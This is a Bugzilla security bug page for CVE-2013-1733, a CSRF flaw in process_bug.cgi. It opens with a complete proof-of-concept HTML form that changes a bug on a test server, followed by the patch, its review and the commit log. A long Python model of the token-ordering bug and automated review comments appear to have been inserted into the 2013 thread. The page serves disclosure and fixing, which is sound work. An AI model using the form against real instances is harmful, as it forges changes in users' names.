Bug 911593 - (CVE-2013-1733) [SECURITY] CSRF in process_bug.cgi
Status: RESOLVED FIXED
Keywords: regression, sec-critical, wsec-csrf
Product: Bugzilla
Classification: Server Software
Component: Creating/Changing Bugs
Version: 4.4
Platform: All All
Importance: -- major
Target Milestone: Bugzilla 4.4
Assigned To: Frédéric Buclin
QA Contact: default-qa
Mentors:
URL: https://landfill.bugzilla.org/bugzill...
Depends on: 69447
Blocks: 912643 912661

Reported: 2013-09-01 12:50 PDT by Mateusz Goik
Modified: 2014-07-24 16:54 PDT
CC: 4 users
Flags:
mail: approval+
mail: approval4.4+
LpSolit: blocking4.4.1+
abillings: sec-bounty+
See Also:
QA Whiteboard:
Iteration: ---
Points: ---


Attachments
patch, v1 (2.41 KB, patch)
2013-09-01 15:40 PDT, Frédéric Buclin
dkl: review+

Description Mateusz Goik 2013-09-01 12:50:44 PDT
PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST">
      <input type="hidden" name="delta&#95;ts" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="longdesclength" value="1" />
      <input type="hidden" name="id" value="21951" />
      <input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="alias" value="aaaaaaaaa" />
      <input type="hidden" name="short&#95;desc" value="TEST2" />
      <input type="hidden" name="product" value="FoodReplicator" />
      <input type="hidden" name="classification" value="Unclassified" />
      <input type="hidden" name="component" value="renamed&#32;component" />
      <input type="hidden" name="rep&#95;platform" value="PC" />
      <input type="hidden" name="op&#95;sys" value="Linux" />
      <input type="hidden" name="priority" value="P2" />
      <input type="hidden" name="bug&#95;severity" value="normal" />
      <input type="hidden" name="target&#95;milestone" value="&#45;&#45;&#45;" />
      <input type="hidden" name="assigned&#95;to" value="mybutt&#64;inyourface&#46;com" />
      <input type="hidden" name="qa&#95;contact" value="" />
      <input type="hidden" name="bug&#95;file&#95;loc" value="" />
      <input type="hidden" name="status&#95;whiteboard" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="tag" value="" />
      <input type="hidden" name="dependson" value="" />
      <input type="hidden" name="blocked" value="" />
      <input type="hidden" name="newcc" value="" />
      <input type="hidden" name="defined&#95;bug&#95;ignored" value="1" />
      <input type="hidden" name="see&#95;also" value="" />
      <input type="hidden" name="cf&#95;large&#95;text" value="" />
      <input type="hidden" name="cf&#95;free&#95;text" value="" />
      <input type="hidden" name="defined&#95;cf&#95;mulitple&#95;select" value="" />
      <input type="hidden" name="cf&#95;drop&#95;down" value="&#45;&#45;&#45;" />
      <input type="hidden" name="cf&#95;date" value="" />
      <input type="hidden" name="cf&#95;bug&#95;id" value="" />
      <input type="hidden" name="flag&#95;type&#45;8" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;8" value="" />
      <input type="hidden" name="flag&#95;type&#45;9" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;9" value="" />
      <input type="hidden" name="flag&#95;type&#45;11" value="X" />
      <input type="hidden" name="flag&#95;type&#45;5" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;5" value="" />
      <input type="hidden" name="flag&#95;type&#45;10" value="X" />
      <input type="hidden" name="flag&#95;type&#45;6" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;6" value="" />
      <input type="hidden" name="flag&#95;type&#45;12" value="X" />
      <input type="hidden" name="estimated&#95;time" value="0&#46;0" />
      <input type="hidden" name="work&#95;time" value="0" />
      <input type="hidden" name="remaining&#95;time" value="0&#46;0" />
      <input type="hidden" name="deadline" value="" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="bug&#95;status" value="CONFIRMED" />
      <input type="hidden" name="resolution" value="FIXED" />
      <input type="hidden" name="dup&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Comment 1 Frédéric Buclin 2013-09-01 14:13:30 PDT
Confirmed! This is a regression due to bug 69447 which generates a new valid token without first making sure that the midair collision page will be displayed. This bug only affects 4.4 and newer. 4.3.3 and older are not affected.
Comment 2 Frédéric Buclin 2013-09-01 14:23:08 PDT
I'm on it. Easy to fix.
Comment 3 Frédéric Buclin 2013-09-01 15:40:10 PDT
Created attachment 798337 [details] [diff] [review]
patch, v1

The new token must only be generated when we are going to display the midair collision page. Also, I had to validate delta_ts, else it was possible to crash PostgreSQL if you passed an invalid one.
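The ordering problem described in comments 1 and 3, as an added Python model that is not Bugzilla's code. The HMAC token scheme, the activity store, the rule that CC-only changes do not trigger the mid-air page, and the detail that the freshly issued token stands in for the submitted one on the no-mid-air path are all assumptions, chosen so that the model reproduces what the PoC in the description shows (a bogus `token` and `delta_ts` still change the bug). `process_bug_vulnerable` mints the new token as soon as `delta_ts` mismatches; `process_bug_fixed` validates `delta_ts` first and mints only when the mid-air page is actually displayed, so the token that gets checked is the one the browser sent.

```python
# Model of the CVE-2013-1733 token-ordering bug in process_bug.cgi.
# Constructed example, not Bugzilla code: the token scheme, the activity store,
# the CC-only rule and the token substitution are assumptions.
import hashlib
import hmac
import secrets
from datetime import datetime

SITE_SECRET = secrets.token_bytes(32)  # assumed stand-in for the site secret


class UserError(Exception):
    """Where Bugzilla would ThrowUserError (e.g. a bad token)."""


class CodeError(Exception):
    """Where Bugzilla would ThrowCodeError (e.g. an unparsable timestamp)."""


class Bug:
    def __init__(self, bug_id, delta_ts, short_desc, history):
        self.id = bug_id
        self.delta_ts = delta_ts      # last-modified stamp 'YYYY-MM-DD HH:MM:SS'
        self.short_desc = short_desc
        self.history = history        # assumed: [(timestamp string, fieldname)]


def datetime_from(value):
    """Parse a Bugzilla-style timestamp; None on failure, like the Perl helper."""
    try:
        return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
    except (TypeError, ValueError):
        return None


def issue_hash_token(user, data):
    """Assumed stand-in for issue_hash_token(): HMAC over session user + data."""
    msg = "|".join([user] + [str(d) for d in data]).encode()
    return hmac.new(SITE_SECRET, msg, hashlib.sha256).hexdigest()


def check_hash_token(user, token, data):
    if not token or not hmac.compare_digest(token, issue_hash_token(user, data)):
        raise UserError("token_does_not_exist")


def midair_needed(bug, since):
    """Assumed rule: mid-air page only for non-CC changes after `since`; a
    garbage delta_ts (since is None) matches nothing on a lenient backend."""
    if since is None:
        return False
    return any(f != "cc" and datetime_from(ts) > since for ts, f in bug.history)


def process_bug_vulnerable(user, bug, form):
    """Assumed ordering behind comment 1: the new token is minted before we know
    whether the mid-air page will be shown, and it replaces the submitted token
    on the path that continues to the update."""
    token = form.get("token")
    submitted = form.get("delta_ts")
    if submitted and submitted != bug.delta_ts:
        token = issue_hash_token(user, [bug.id, bug.delta_ts])  # minted too early
        if midair_needed(bug, datetime_from(submitted)):
            return "midair", token
    check_hash_token(user, token, [bug.id, bug.delta_ts])  # sees the fresh token
    bug.short_desc = form["short_desc"]
    return "updated", None


def process_bug_fixed(user, bug, form):
    """Ordering from comment 3: validate delta_ts, mint a token only when the
    mid-air page is really displayed, otherwise check the submitted token."""
    submitted = form.get("delta_ts")
    if submitted:
        since = datetime_from(submitted)
        if since is None:
            raise CodeError("invalid_timestamp")  # keep garbage away from the DB
        if since != datetime_from(bug.delta_ts) and midair_needed(bug, since):
            return "midair", issue_hash_token(user, [bug.id, bug.delta_ts])
    check_hash_token(user, form.get("token"), [bug.id, bug.delta_ts])
    bug.short_desc = form["short_desc"]
    return "updated", None


def outcome(handler, user, bug, form):
    """Run a handler and report what the user sees: a status or the error class."""
    try:
        return handler(user, bug, form)[0]
    except (UserError, CodeError) as exc:
        return type(exc).__name__


def poc_form():
    """The reporter's PoC reduced to the fields this model reads (constructed)."""
    return {"id": "21951", "delta_ts": "aaaaaaaaaaaaaaaaaaaaa", "longdesclength": "1",
            "token": "aaaaaaaaaaaaaaaaaaaaa", "short_desc": "TEST2"}


def make_bug(last_field="cc"):
    """Constructed bug whose only change, at 11:00, touched `last_field`."""
    return Bug(21951, "2013-09-01 11:00:00", "original summary",
               [("2013-09-01 11:00:00", last_field)])
```

Two cases are worth running side by side: the PoC's garbage `delta_ts`, which the fixed ordering rejects as an invalid timestamp before anything touches the database, and a well-formed but stale `delta_ts` with a forged token, which the vulnerable ordering also accepts whenever the intervening changes are CC-only. The second case is why tightening the timestamp validation alone would not have closed the CSRF; the token has to be checked before any path that can reach the update.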
Comment 4 Daniel Veditz [:dveditz] 2013-09-04 12:27:29 PDT
Assigning CVE-2013-1733 to this vulnerability.
Comment 5 David Lawrence [:dkl] 2013-09-04 13:20:36 PDT
Comment on attachment 798337 [details] [diff] [review]
patch, v1

Review of attachment 798337 [details] [diff] [review]:
-----------------------------------------------------------------

Looks fine and fixes the issue for me. r=dkl

::: process_bug.cgi
@@ +114,5 @@
> +my $delta_ts = $cgi->param('delta_ts');
> +
> +if ($delta_ts) {
> +    my $delta_ts_z = datetime_from($delta_ts)
> +      or ThrowCodeError('invalid_timestamp', { timestamp => $delta_ts });
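Review bot: the guard `if ($delta_ts)` tests Perl truthiness rather than presence, so a submitted `delta_ts` of `0` or the empty string skips both the new `datetime_from` validation and the entire mid-air collision block and is processed as if no `delta_ts` had been sent at all; if treating a tampered `0` like a missing field is intended it deserves a comment, otherwise gate on `if (defined $delta_ts && $delta_ts ne '')` and let `datetime_from` reject the `0` like any other unparsable value.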

nit: 4 space indentation

@@ +124,3 @@
>  
> +        my $start_at = $cgi->param('longdesclength')
> +          or ThrowCodeError('undefined_field', { field => 'longdesclength' });
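Review bot: `longdesclength` is request input under the attacker's control and this line only checks that it is truthy, so values such as `abc`, `-1` or `1e9` pass; if `$start_at` is used further down as a comment offset or count, validate it as a non-negative integer here, for example by adding `detaint_natural($start_at) or ThrowCodeError('undefined_field', { field => 'longdesclength' });` on the next line, which also untaints it for any later use in a query.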

same nit
Comment 6 Frédéric Buclin 2013-09-04 13:23:41 PDT
(In reply to David Lawrence [:dkl] from comment #5)
> nit: 4 space indentation

Not when splitting long lines. ;)
Comment 7 mail 2013-09-05 18:43:57 PDT
Will be patched on bugzilla.redhat.com at 4am UTC (just over two hours from now)
Comment 8 Daniel Veditz [:dveditz] 2013-09-30 15:22:28 PDT
Dave: does this affect BMO? iirc we're on 4.2 plus backported goodies and may or may not suffer from this.
Comment 9 Frédéric Buclin 2013-09-30 15:24:07 PDT
(In reply to Daniel Veditz [:dveditz] from comment #8)
> Dave: does this affect BMO?

Yes, see bug 912661.
Comment 10 Frédéric Buclin 2013-10-16 10:00:00 PDT
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified process_bug.cgi
Committed revision 8777.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified process_bug.cgi
Committed revision 8623.
Comment 11 Frédéric Buclin 2013-10-17 07:58:56 PDT
Security advisory sent.
